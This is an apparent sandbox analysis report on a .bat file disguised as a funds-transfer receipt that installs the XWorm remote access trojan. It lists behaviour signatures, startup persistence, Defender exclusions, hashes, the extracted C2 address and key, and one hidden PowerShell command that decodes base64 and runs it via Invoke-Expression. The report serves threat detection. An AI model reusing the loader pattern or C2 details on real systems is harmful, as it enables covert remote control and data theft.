File name: 24032025_0932_CustomerReceiptforFundsTransfer_20250324-E-SWFT886050AX52951DU-CN_EU.bat.gz

Full analysis: https://app.any.run/tasks/390653cc-1cd3-4666-b87b-e91c061da9ec
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Analysis date: March 24, 2025, 09:39:09
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
remote
xworm
Indicators:
MIME: application/gzip
File info: gzip compressed data, was "Customer Receipt for Funds Transfer#_20250324-#E-SWFT886050AX52951DU-CN_EU.bat", last modified: Mon Mar 24 05:59:26 2025, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 284719
MD5: AE0091C7BFBBAE796FD538699BF69071
SHA1: 416EB765408E1E65EC9B6001208BF1A803740DBB
SHA256: 34F1E780523742ED97BE905C5EFE2BC78161BC1AFA1993B1B1B9198BE13EC831
SSDEEP: 6144:C/gM6rIqj3UG/+9a7UtnK+d6jxxhOqQIubOrgSS:2ghrjEG/+SUPowqSOrgSS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7436)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Create files in the Startup directory

      • powershell.exe (PID: 7676)
    • Changes Windows Defender settings

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7292)
    • Adds path to the Windows Defender exclusion list

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7292)
    • XWORM has been detected (YARA)

      • powershell.exe (PID: 8048)
    • XWORM has been detected (SURICATA)

      • powershell.exe (PID: 8048)
  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)
    • Application launched itself

      • cmd.exe (PID: 7552)
      • cmd.exe (PID: 7912)
      • powershell.exe (PID: 8048)
      • cmd.exe (PID: 6872)
      • cmd.exe (PID: 4688)
      • powershell.exe (PID: 7292)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7552)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 7912)
      • cmd.exe (PID: 6872)
      • cmd.exe (PID: 4688)
      • powershell.exe (PID: 2392)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7552)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 7912)
      • powershell.exe (PID: 2392)
      • cmd.exe (PID: 4688)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • powershell.exe (PID: 8048)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)
      • powershell.exe (PID: 7292)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7292)
    • Executing commands from ".cmd" file

      • cmd.exe (PID: 6872)
    • Contacting a server suspected of hosting a CnC

      • powershell.exe (PID: 8048)
    • Connects to unusual port

      • powershell.exe (PID: 8048)
  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 7552)
      • cmd.exe (PID: 6872)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)
    • Autorun file from Startup directory

      • powershell.exe (PID: 7676)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7148)
      • powershell.exe (PID: 7276)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7148)
      • powershell.exe (PID: 7276)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report

XWorm configuration

Process: powershell.exe (PID 8048)
C2: xinclas.vmcentra.top:2829
Keys:
  AES: <123456789>
Options:
  Splitter: <Xwormmm>
  Sleep time: 3
  USB drop name: NuERA
  Mutex: zLUa7lrxp891NcIY

TRiD: .z/gz/gzip | GZipped data (100)

EXIF (ZIP):
  Compression: Deflated
  Flags: FileName
  ModifyDate: 2025:03:24 05:59:26+00:00
  ExtraFlags: (none)
  OperatingSystem: FAT filesystem (MS-DOS, OS/2, NT/Win32)
  ArchivedFileName: Customer Receipt for Funds Transfer#_20250324-#E-SWFT886050AX52951DU-CN_EU.bat
Total processes: 146
Monitored processes: 27
Malicious processes: 12
Suspicious processes: 0

Behavior graph

Graph nodes in order (full graph in the full report): winrar.exe, cmd.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe, cmd.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe (#XWORM), powershell.exe, conhost.exe, cmd.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe, cmd.exe, conhost.exe, cmd.exe, conhost.exe, powershell.exe, svchost.exe, powershell.exe, conhost.exe, slui.exe

Process information

Each entry lists PID, command line (CMD), image path, parent process, and process attributes, followed by the loaded modules.
PID: 1020
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1228
CMD: C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_62c776d3.cmd"
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1512
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2392
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 2420
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3784
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4268
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4688
CMD: "C:\WINDOWS\System32\cmd.exe" /C "C:\Users\admin\dwm.bat"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 4784
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 38 388
Read events: 38 377
Write events: 11
Delete events: 0

Modification events

Process: WinRAR.exe (PID 7436)
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
  Operation: write | Name: 3 | Value: C:\Users\admin\Desktop\preferences.zip
  Operation: write | Name: 2 | Value: C:\Users\admin\Desktop\chromium_ext.zip
  Operation: write | Name: 1 | Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
  Operation: write | Name: 0 | Value: C:\Users\admin\Desktop\24032025_0932_CustomerReceiptforFundsTransfer_20250324-E-SWFT886050AX52951DU-CN_EU.bat.gz

Process: WinRAR.exe (PID 7436)
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
  Operation: write | Name: name | Value: 120
  Operation: write | Name: size | Value: 80
  Operation: write | Name: type | Value: 120
  Operation: write | Name: mtime | Value: 100

Process: powershell.exe (PID 7676)
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
  Operation: write | Name: C:\WINDOWS\System32\cmd.exe.FriendlyAppName | Value: Windows Command Processor
  Operation: write | Name: C:\WINDOWS\System32\cmd.exe.ApplicationCompany | Value: Microsoft Corporation
Executable files: 0
Suspicious files: 1
Text files: 18
Unknown types: 0

Dropped files

PID 7676, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ekuzqu2q.e2d.ps1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 7612, cmd.exe: C:\Users\admin\dwm.bat (text)
  MD5: 943329DF40DBDB287C26695E487602C2
  SHA256: 181510E15F65F9422B2E8B129BC6D3E4D50CBFB46E778E280F4A208780254287
PID 8048, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4cf3828c.cmd (text)
  MD5: 943329DF40DBDB287C26695E487602C2
  SHA256: 181510E15F65F9422B2E8B129BC6D3E4D50CBFB46E778E280F4A208780254287
PID 7276, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3lawsix4.gji.psm1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 7292, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qoljuseh.3lv.ps1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 7148, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uhpgb3ws.imu.psm1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 2392, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zemvdgtg.hfn.psm1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 2392, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_73e88fd8.cmd (text)
  MD5: 943329DF40DBDB287C26695E487602C2
  SHA256: 181510E15F65F9422B2E8B129BC6D3E4D50CBFB46E778E280F4A208780254287
PID 7292, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jksdcqvq.oj1.psm1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 7276, powershell.exe: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_my1wepvg.sd3.ps1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download the PCAP and analyze network streams, HTTP content and more in the full report

HTTP(S) requests: 2
TCP/UDP connections: 38
DNS requests: 6
Threats: 18

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted
- | - | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
8048 | powershell.exe | 37.120.153.94:2829 | xinclas.vmcentra.top | M247 Ltd | SE | malicious
4920 | slui.exe | 40.91.76.224:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
8048 | powershell.exe | 37.120.156.182:2829 | xinclas.vmcentra.top | M247 Ltd | PL | malicious
7428 | slui.exe | 40.91.76.224:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.124.78.146, 20.73.194.208 | whitelisted
google.com | 216.58.206.78 | whitelisted
xinclas.vmcentra.top | 37.120.153.94, 37.120.156.182 | malicious
activation-v2.sls.microsoft.com | 40.91.76.224 | whitelisted

Threats

PID | Process | Class | Message
2196 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile
8048 | powershell.exe | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] Xworm Network Packet (9 alerts)